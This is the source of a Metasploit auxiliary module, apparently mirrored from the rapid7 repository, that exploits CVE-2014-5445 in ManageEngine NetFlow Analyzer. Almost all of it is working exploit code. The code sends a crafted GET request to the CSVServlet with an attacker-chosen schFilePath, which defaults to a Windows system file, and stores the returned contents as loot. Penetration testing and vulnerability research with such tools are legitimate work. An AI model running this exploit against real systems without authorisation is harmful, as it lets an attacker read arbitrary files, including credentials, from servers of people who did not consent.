CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/netflow_file_download.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Report

8
  include Msf::Exploit::Remote::HttpClient

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',

15
        'Description' => %q{

16
          This module exploits an arbitrary file download vulnerability in CSVServlet

17
          on ManageEngine NetFlow Analyzer. This module has been tested on both Windows

18
          and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you

19
          must escape the backslash with a backslash.

20
        },

21
        'Author' => [

22
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2014-5445' ],

27
          [ 'OSVDB', '115340' ],

28
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],

29
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]

30
        ],

31
        'DisclosureDate' => '2014-11-30'

32
      )

33
    )

34


35
    register_options(

36
      [

37
        Opt::RPORT(8080),

38
        OptString.new('TARGETURI',

39
                      [ true, 'The base path to NetFlow Analyzer', '/netflow' ]),

40
        OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),

41
      ]

42
    )

43
  end

44


45
  def run

46
    # Create request

47
    begin

48
      print_status("Downloading file #{datastore['FILEPATH']}")

49
      res = send_request_cgi({

50
        'method' => 'GET',

51
        'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),

52
        'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }

53
      })

54
    rescue Rex::ConnectionError

55
      print_error('Could not connect.')

56
      return

57
    end

58


59
    # Show data if needed

60
    if res && res.code == 200

61
      if res.body.to_s.bytesize == 0

62
        print_error('0 bytes returned, file does not exist or it is empty.')

63
        return

64
      end

65
      vprint_line(res.body.to_s)

66
      fname = File.basename(datastore['FILEPATH'])

67


68
      path = store_loot(

69
        'netflow.http',

70
        'application/octet-stream',

71
        datastore['RHOST'],

72
        res.body,

73
        fname

74
      )

75
      print_good("File saved in: #{path}")

76
    else

77
      print_error('Failed to download file.')

78
    end

79
  end

80
end

81


82